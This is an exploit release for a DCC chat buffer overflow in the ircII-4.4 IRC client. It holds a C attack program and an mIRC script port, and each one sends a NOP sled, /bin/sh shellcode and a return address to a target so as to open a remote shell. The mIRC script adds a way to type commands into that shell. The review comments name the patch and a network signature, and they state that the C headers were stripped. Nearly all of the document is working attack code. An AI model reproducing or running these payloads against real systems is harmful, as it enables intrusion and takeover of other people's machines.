The following exploits are for IrcII4.4. A dcc chat buffer overflow, one is for linux and the other one is for mirc.
-- start irciisploit.txt --
/*
 * ircii-4.4 exploit by bladi & aLmUDeNa
 * buffer overflow in ircII's DCC chat handling allows executing arbitrary code
 * Affected: ircII-4.4
 * Patch: Upgrade to ircII-4.4M ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
 * Offset: SuSe 6.x :0xbfffe3ff RedHat :0xbfffe888
 * Thanks to : #warinhell,#hacker_novatos
 * Special thanks go to: Topo[lb],
 * Saludos para todos los que nos conozcan especialmente para eva ;) (bladi@euskalnet.net)
 *
 * NOTE(review): this is a historical proof-of-concept against a client version
 * that has been superseded; the only fix is the upgrade named above. From the
 * defender's side the traffic pattern is a DCC CHAT connection followed by a
 * long run of 0x90 bytes and then non-printable bytes, which is not legitimate
 * chat text.
 */
/* NOTE(review): the header names between the angle brackets were stripped by
 * extraction; the file as shown does not compile. */
#include
#include
#include
#include
#include
#include
#include
#include

char *h_to_ip(char *hostname);

/*
 * Resolve hostname with gethostbyname() and return it as a dotted-quad string.
 * Exits the process (status 0) if resolution fails.
 * Returns the static buffer of inet_ntoa(); the caller must not free it.
 */
char *h_to_ip(char *hostname)
{
    struct hostent *hozt;
    struct sockaddr_in tmp;
    struct in_addr in;

    if ((hozt=gethostbyname(hostname))==NULL) {
        printf(" ERROR: IP incorrecta\n");
        exit(0);
    }
    /* h_length bytes are copied into a 4-byte field without a length check;
     * only the first 4 bytes are then used. */
    memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
    memcpy(&in,&tmp.sin_addr.s_addr,4);
    return(inet_ntoa(in));
}

/*
 * Entry point: connects to <hostname> <port> (argv[1], argv[2]) and writes
 * three byte sequences to the socket: a NOP sled, the shell-spawning payload,
 * and a repeated four-byte value. Return values of socket()/write() are not
 * checked; `tnt` is declared but never used.
 */
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    char *hostname;
    /* 16 x 0x90, written 47 times below (752 bytes in total). */
    char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    /* Machine code that ends in "/bin/sh"; written once, after the sled. */
    char *shell = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int outsocket,tnt,i;

    printf (" irciismash ver: 1.0\n");
    printf (" by \n");
    printf (" bladi & aLmUDeNa\n\n");
    if (argc<3) {
        printf("Usage : %s hostname port\n",argv[0]);
        exit(-1);
    }
    hostname=argv[1];
    outsocket=socket(AF_INET,SOCK_STREAM,0);
    sin.sin_family=AF_INET;
    /* atoi() gives no error indication for a non-numeric port. */
    sin.sin_port=htons(atoi(argv[2]));
    sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
    if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
        printf(" ERROR: El puerto esta cerradito :_(\n");
        exit(0);
    }
    printf("[1]- Noping\n [");
    for(i=0;i<47;i++) {
        if (!(i % 7)) {
            usleep (9);
            printf(".");
            fflush(stdout);
        }
        write(outsocket,nops,strlen(nops));
    }
    printf("]\n");
    printf(" Noped\n");
    printf("[2]- Injectin shellcode\n");
    write(outsocket,shell,strlen(shell));
    usleep(999);
    printf(" Injected\n");
    printf("[3]- Waiting\n [");
    /* The four single-byte writes together spell the SuSE value given in the
     * header comment (0xbfffe3ff, little-endian); each strlen() below is 1. */
    for(i=0;i<299;i++) {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket,"\xff",strlen("\xff"));
        write(outsocket,"\xbf",strlen("\xff"));
        write(outsocket,"\xff",strlen("\xe9"));
        write(outsocket,"\xe3",strlen("\xff"));
    }
    printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
    close(outsocket);
}
-- end irciisploit.txt --
-- start ide_expl.mrc --
# Wrote directly from irciisploit.txt(a .c program for *nix), that someone gave me to port to mirc.
#
# Exploit to overflow a buffer and run a shell. Although, more often than not it will crash/seg fault
# with both versions of this exploit, by default. (exploit noted as being for V4.4, and patched in
# V4.4M)
#
# irciisploit.txt by: bladi & aLmUDeNa
# irciisploit.mrc(this) by: _v9(vade79)
#
# Also included in the exploit(irciisploit.txt) were some other offsets:
#
# "SuSe 6.x :0xbfffe3ff"
# "RedHat :0xbfffe888"
#
# To load this script into mIRC5.7: /load -rs
#
# NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if
# the connection still exists, so if you see a /sockwrite error in the status window, the user
# probably seg faulted.
; NOTE(review): the /load and Syntax lines above and below lost their <argument>
; text during extraction (the script path and the target nick respectively).
; bin: convert a two-character hex string ($1) to its decimal value.
; Returns nothing when $1 is not exactly two characters. Lower-case a-f are
; mapped through $asc()-87; the extra closing parenthesis in the two $calc()
; lines is as in the original.
alias -l bin {
  if ($len($1) != 2) { return }
  var %i, %j, %k
  if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }
  else { %i = $left($1,1) }
  if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }
  else { %j = $right($1,1) }
  while (%i) { %k = %k + 16 | dec %i }
  return $calc(%k + %j)
}
; make_string: split a "\xNN\xNN..." string ($1) on the backslashes and return
; the space-separated decimal byte values, for use with /bset.
alias -l make_string {
  var %i = 1, %j
  while ($gettok($replace($1,\x,\),0,92) >= %i) {
    %j = %j $bin($gettok($replace($1,\x,\),%i,92))
    inc %i
  }
  return %j
}
; wn: name of the custom window used for output.
alias -l wn return @ircii4.4_dcc_exploit
; sw: wrapper around /sockwrite that first checks the socket is still active,
; closes the window and reports %ide.status if not, and otherwise shows the
; last payload in the title bar.
alias -l sw {
  if ($2) {
    if ($sock(exp_ide).status != active) {
      if ($window($wn)) { window -c $wn }
      echo -a Connection lost/non-existant. ( $+ %ide.status $+ )
    }
    else {
      if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }
      sockwrite $1-
    }
  }
}
; main: open the output window, pick a free listening port in 1024-4096 and
; send a DCC CHAT offer to nick $1 pointing at that port.
alias -l main {
  if ($window($wn)) { window -c $wn } | window -aek $wn
  echo $wn *** [01]: sending DCC chat request, waiting...
  set %ide.nick $1 | set %ide.port $rand(1024,4096)
  while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }
  sockclose exp_ide_base | socklisten exp_ide_base %ide.port
  .quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)
}
; exploit_ircii: user-facing command; requires a server connection, no open
; exploit window, and mIRC 5.7 or later.
alias exploit_ircii {
  if ($server) {
    if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }
    elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }
    elseif ($1) { main $1 }
    else { echo -a Syntax: /exploit_ircii }
  }
}
; Echo whatever the remote side sends back into the window.
on 1:SOCKREAD:exp_ide: {
  if ($sockerr > 0) return
  :read
  sockread %data
  if ($sockbr == 0) return
  if (%data == $null) var %data = (no data)
  if ($window($wn)) { echo $wn -> %data }
  goto read
}
; Once the target accepts the DCC offer: build the byte buffers and write them
; in the same order as the C version (47 x nops, payload, 299 x four bytes).
; %ide.status counts the stages 0..4.
on 1:SOCKLISTEN:exp_ide_base: {
  sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base
  unset %ide.status
  if ($window($wn)) {
    set %ide.status 0
    echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)
    bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)
    bset &o 1 $make_string(\xff\xbf\xff\xe3)
    bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)
    bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh
    echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)
    inc %ide.status
    echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.
    var %i = 0
    while (%i < 47) {
      sw exp_ide &nops
      inc %i
    }
    inc %ide.status
    echo $wn *** [--]: * (2/4) sent, now sending the shell code.
    sw exp_ide &shellcode
    ; Busy-wait loops stand in for the usleep() calls of the C version.
    %i = 0 | while (%i < 9999) { inc %i }
    inc %ide.status
    echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.
    %i = 0
    while (%i < 299) {
      var %j = 0 | while (%j < 499) { inc %j }
      var %j = 1
      while ($bvar(&o,%j)) {
        bset &bit 1 $bvar(&o,%j)
        sw exp_ide &bit
        inc %j
      }
      inc %i
    }
    inc %ide.status
    echo $wn *** [--]: * (4/4) sent, done.
  }
  else { sockclose exp_ide }
}
; Clean up the window and state when the remote side disconnects.
on 1:SOCKCLOSE:exp_ide: {
  if ($window($wn)) { window -c $wn }
  echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )
  unset %ide.*
}
; Closing the output window tears down both sockets.
on 1:CLOSE:@: {
  if ($target == $wn) {
    if ($sock(exp_ide)) { sockclose exp_ide }
    if ($sock(exp_ide_base)) { sockclose exp_ide_base }
    unset %ide.*
  }
}
; Text typed into the window is forwarded to the socket once stage 4 is reached.
on 1:INPUT:@: {
  if ($active == $wn) {
    if ($sock(exp_ide).status == active) {
      if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }
      else { echo $wn <- $1- | sw -n exp_ide $1- }
    }
    else { echo $wn *** Error, socket status isn't online yet. }
    halt
  }
}
; Refuse to stay loaded on mIRC versions before 5.7.
on 1:LOAD: {
  if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }
  else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii . }
}
-- end ide_expl.mrc --